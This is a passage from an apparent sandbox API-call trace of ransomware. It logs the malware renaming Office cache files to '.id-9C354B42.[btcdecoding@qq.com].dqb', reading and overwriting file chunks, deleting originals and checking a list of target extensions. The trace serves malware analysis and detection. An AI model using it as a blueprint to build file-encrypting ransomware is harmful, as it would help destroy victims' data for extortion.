(lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0042.704] lstrlenW (lpString=".jpg") returned 4 [0042.704] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.704] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0042.704] lstrlenW (lpString="GrooveLR.cab") returned 12 [0042.704] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0043.310] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=4095519) returned 1 [0043.310] CloseHandle (hObject=0x184) returned 1 [0043.311] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab")) returned 0x2020 [0043.311] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.311] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0043.311] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0043.311] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0043.312] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0043.312] ReadFile (in: hFile=0x184, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.316] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0043.316] ReadFile (in: hFile=0x184, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.319] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.319] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0043.319] ReadFile (in: hFile=0x184, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.333] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.334] WriteFile (in: hFile=0x184, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0043.355] SetEndOfFile (hFile=0x184) returned 1 [0043.687] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f02070 [0043.687] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0043.687] WriteFile (in: hFile=0x184, lpBuffer=0x3f02070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f02070*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.689] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0043.689] WriteFile (in: hFile=0x184, lpBuffer=0x3f02070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f02070*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.691] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0043.691] WriteFile (in: hFile=0x184, lpBuffer=0x3f02070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f02070*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.693] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f02070 | out: hHeap=0x570000) returned 1 [0043.693] CloseHandle (hObject=0x184) returned 1 [0043.693] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0043.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.695] lstrlenW (lpString=".doc") returned 4 [0043.695] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.695] lstrlenW (lpString=".docx") returned 5 [0043.695] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.695] lstrlenW (lpString=".pdf") returned 4 [0043.695] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.695] lstrlenW (lpString=".xls") returned 4 [0043.695] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString=".xlsx") returned 5 [0043.696] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.696] lstrlenW (lpString=".ppt") returned 4 [0043.696] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.696] lstrlenW (lpString=".zip") returned 4 [0043.696] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString=".rar") returned 4 [0043.696] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString=".bz2") returned 4 [0043.696] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.696] lstrlenW (lpString=".7z") returned 3 [0043.696] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.696] lstrlenW (lpString=".dbf") returned 4 [0043.696] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.696] lstrlenW (lpString=".1cd") returned 4 [0043.696] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.696] lstrlenW (lpString=".jpg") returned 4 [0043.696] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.696] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.696] lstrlenW (lpString=".doc") returned 4 [0043.696] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString=".docx") returned 5 [0043.696] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.696] lstrlenW (lpString=".pdf") returned 4 [0043.696] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString=".xls") returned 4 [0043.696] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.696] lstrlenW (lpString=".xlsx") returned 5 [0043.696] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.696] lstrlenW (lpString=".ppt") returned 4 [0043.697] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.697] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.697] lstrlenW (lpString=".zip") returned 4 [0043.697] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.697] lstrlenW (lpString=".rar") returned 4 [0043.697] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.697] lstrlenW (lpString=".bz2") returned 4 [0043.697] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.697] lstrlenW (lpString=".7z") returned 3 [0043.697] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.697] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.697] lstrlenW (lpString=".dbf") returned 4 [0043.697] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.697] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.697] lstrlenW (lpString=".1cd") returned 4 [0043.697] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.697] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0043.697] lstrlenW (lpString=".jpg") returned 4 [0043.697] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.697] lstrcmpiW (lpString1=".manifest", lpString2=".dqb") returned 1 [0043.697] lstrlenW (lpString="Microsoft.VC90.CRT.manifest") returned 27 [0043.697] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.450] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1857) returned 1 [0044.450] CloseHandle (hObject=0x174) returned 1 [0044.450] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 0x2020 [0044.450] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.450] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.450] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.450] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.450] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.451] GetLastError () returned 0x0 [0044.451] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x741, lpOverlapped=0x0) returned 1 [0044.458] WriteFile (in: hFile=0x20c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x750, lpOverlapped=0x0) returned 1 [0044.459] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.459] WriteFile (in: hFile=0x20c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x10a, lpOverlapped=0x0) returned 1 [0044.460] SetEndOfFile (hFile=0x20c) returned 1 [0044.460] CloseHandle (hObject=0x20c) returned 1 [0044.460] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.460] SetEndOfFile (hFile=0x174) returned 1 [0044.461] CloseHandle (hObject=0x174) returned 1 [0044.461] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.461] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1 [0044.461] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.461] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.461] lstrlenW (lpString=".doc") returned 4 [0044.461] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0044.461] lstrlenW (lpString=".docx") returned 5 [0044.461] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0044.461] lstrlenW (lpString=".pdf") returned 4 [0044.461] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0044.461] lstrlenW (lpString=".xls") returned 4 [0044.461] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0044.461] lstrlenW (lpString=".xlsx") returned 5 [0044.461] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0044.461] lstrlenW (lpString=".ppt") returned 4 [0044.462] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.462] lstrlenW (lpString=".zip") returned 4 [0044.462] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString=".rar") returned 4 [0044.462] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString=".bz2") returned 4 [0044.462] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString=".7z") returned 3 [0044.462] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0044.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.462] lstrlenW (lpString=".dbf") returned 4 [0044.462] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.462] lstrlenW (lpString=".1cd") returned 4 [0044.462] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.462] lstrlenW (lpString=".jpg") returned 4 [0044.462] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.462] lstrlenW (lpString=".doc") returned 4 [0044.462] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString=".docx") returned 5 [0044.462] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0044.462] lstrlenW (lpString=".pdf") returned 4 [0044.462] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString=".xls") returned 4 [0044.462] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString=".xlsx") returned 5 [0044.462] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0044.462] lstrlenW (lpString=".ppt") returned 4 [0044.462] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0044.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.463] lstrlenW (lpString=".zip") returned 4 [0044.463] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0044.463] lstrlenW (lpString=".rar") returned 4 [0044.463] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0044.463] lstrlenW (lpString=".bz2") returned 4 [0044.463] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0044.463] lstrlenW (lpString=".7z") returned 3 [0044.463] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0044.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.463] lstrlenW (lpString=".dbf") returned 4 [0044.463] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0044.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.463] lstrlenW (lpString=".1cd") returned 4 [0044.463] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0044.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0044.463] lstrlenW (lpString=".jpg") returned 4 [0044.463] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0044.463] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0044.463] lstrlenW (lpString="OfficeLR.cab") returned 12 [0044.463] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.463] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=14127746) returned 1 [0044.463] CloseHandle (hObject=0x174) returned 1 [0044.463] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab")) returned 0x2020 [0044.464] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.464] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0044.464] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.464] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0044.464] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.464] ReadFile (in: hFile=0x174, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.475] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.475] ReadFile (in: hFile=0x174, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.483] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.483] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.483] ReadFile (in: hFile=0x174, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.531] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.531] WriteFile (in: hFile=0x174, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0044.872] SetEndOfFile (hFile=0x174) returned 1 [0044.872] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f34088 [0044.937] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.937] WriteFile (in: hFile=0x174, lpBuffer=0x3f34088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34088*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.937] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.937] WriteFile (in: hFile=0x174, lpBuffer=0x3f34088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34088*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.938] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0044.938] WriteFile (in: hFile=0x174, lpBuffer=0x3f34088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34088*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.940] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f34088 | out: hHeap=0x570000) returned 1 [0044.940] CloseHandle (hObject=0x174) returned 1 [0044.940] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0044.941] lstrlenW (lpString="C:\\MSOCache\\All 